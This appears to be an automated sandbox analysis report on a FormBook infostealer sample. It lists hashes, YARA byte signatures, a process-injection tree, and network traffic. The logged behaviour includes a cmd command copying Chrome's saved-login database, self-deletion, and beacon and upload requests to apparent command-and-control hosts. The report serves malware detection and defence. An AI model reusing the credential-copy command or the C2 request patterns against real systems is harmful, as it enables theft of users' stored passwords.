
Analysis Report 168768566-104646-sdfnt5-8.exe

Overview

General Information

Sample Name: 168768566-104646-sdfnt5-8.exe
MD5: 603a48198c41123efabb3db2e8bbddd9
SHA1: 36d91ddf5700af40a811b1c3483766bf512d5752
SHA256: 02006bc9a2d455f7c478381b5be9283223dd6e859018d6092c9948f665f226d8

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 168768566-104646-sdfnt5-8.exe (PID: 4456 cmdline: 'C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe' MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
    • 168768566-104646-sdfnt5-8.exe (PID: 5220 cmdline: {path} MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cmmon32.exe (PID: 5180 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 5288 cmdline: /c del 'C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • sxah0fixnx-4c.exe (PID: 4396 cmdline: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
        • mstsc.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 1F73D52590D1EDF803FD49EAF32ADC2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source / Rule / Description / Author / Strings

Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source / Rule / Description / Author / Strings

Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x17629:$sqlite3step: 68 34 1C 7B E1
    • 0x1773c:$sqlite3step: 68 34 1C 7B E1
    • 0x17658:$sqlite3text: 68 38 2A 90 C5
    • 0x1777d:$sqlite3text: 68 38 2A 90 C5
    • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17793:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started; Author: Joe Security; Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 5180, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

          Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gilths\sxah0fixnx-4c.exe; Virustotal: Detection: 37%
Multi AV Scanner detection for submitted file
Source: 168768566-104646-sdfnt5-8.exe; Virustotal: Detection: 37%
Yara detected FormBook
Source: Yara match; File source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gilths\sxah0fixnx-4c.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 168768566-104646-sdfnt5-8.exe; Joe Sandbox ML: detected
Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; 18_2_072F16E4
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then push dword ptr [ebp-24h]; 18_2_072F2200
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; 18_2_072F2200
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then push dword ptr [ebp-20h]; 18_2_072F1EE0
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; 18_2_072F1EE0
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then xor edx, edx; 18_2_072F212D
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then xor edx, edx; 18_2_072F2138
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then push dword ptr [ebp-24h]; 18_2_072F21F4
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; 18_2_072F21F4
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then push dword ptr [ebp-20h]; 18_2_072F1ED4
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; 18_2_072F1ED4
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; 18_2_072F19FC

Source: global traffic; HTTP traffic detected: GET /sr1/?azrhA=EEC3trxbjpZjES3J8UzdywVW4camKv5lKnOZdgutgRQJhFNNU6ohax/dLti9iqHJLoKb&HN68=m8ZXDT HTTP/1.1 Host: www.spatren.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic; HTTP traffic detected: GET /sr1/?azrhA=TJu9kd1J3sj1sjyEQYrTfM8kzVKXOtoVWGC/eynSyKofNPs3fDsvQyrmT3NPrOg1vii2&HN68=m8ZXDT HTTP/1.1 Host: www.app7924.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic; HTTP traffic detected: GET /sr1/?azrhA=jkOn9Rty+lecef8GTlcZ36CwLFKq9e7GvHBSrLgwDHppX0QlwzfNM6KJV290CG150kbC&HN68=m8ZXDT HTTP/1.1 Host: www.ptgws.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: global traffic; HTTP traffic detected: POST /sr1/ HTTP/1.1 Host: www.app7924.com Connection: close Content-Length: 411 Cache-Control: no-cache Origin: http://www.app7924.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.app7924.com/sr1/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic; HTTP traffic detected: POST /sr1/ HTTP/1.1 Host: www.app7924.com Connection: close Content-Length: 180335 Cache-Control: no-cache Origin: http://www.app7924.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.app7924.com/sr1/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic; HTTP traffic detected: POST /sr1/ HTTP/1.1 Host: www.ptgws.com Connection: close Content-Length: 411 Cache-Control: no-cache Origin: http://www.ptgws.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ptgws.com/sr1/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic; HTTP traffic detected: POST /sr1/ HTTP/1.1 Host: www.ptgws.com Connection: close Content-Length: 180335 Cache-Control: no-cache Origin: http://www.ptgws.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ptgws.com/sr1/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: unknown; DNS traffic detected: queries for: www.spatren.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 10 Jun 2020 11:38:51 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sr1/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000003.00000000.782503397.0000000000CF0000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpJ
Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/ocid=iehp
Source: cmmon32.exe, 00000004.00000002.1199851699.0000000005609000.00000004.00000001.sdmp; String found in binary or memory: http://www.ptgws.com
Source: cmmon32.exe, 00000004.00000002.1199851699.0000000005609000.00000004.00000001.sdmp; String found in binary or memory: http://www.ptgws.com/sr1/
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\38843287\388logri.ini
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\38843287\388logrf.ini
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\38843287\388logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 0_2_023D038C NtQueryInformationProcess
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 0_2_023D64B0 NtQueryInformationProcess
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_00419830 NtCreateFile
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_004198E0 NtReadFile
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_00419960 NtClose
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_00419A10 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_0041982B NtCreateFile
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_004198DA NtReadFile
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_0041995A NtClose
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_00419A0A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe | Code function: 2_2_004197EA NtCreateFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCACE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA470 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA540 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA750 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA800 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA2D0 NtClose,LdrInitializeThunk
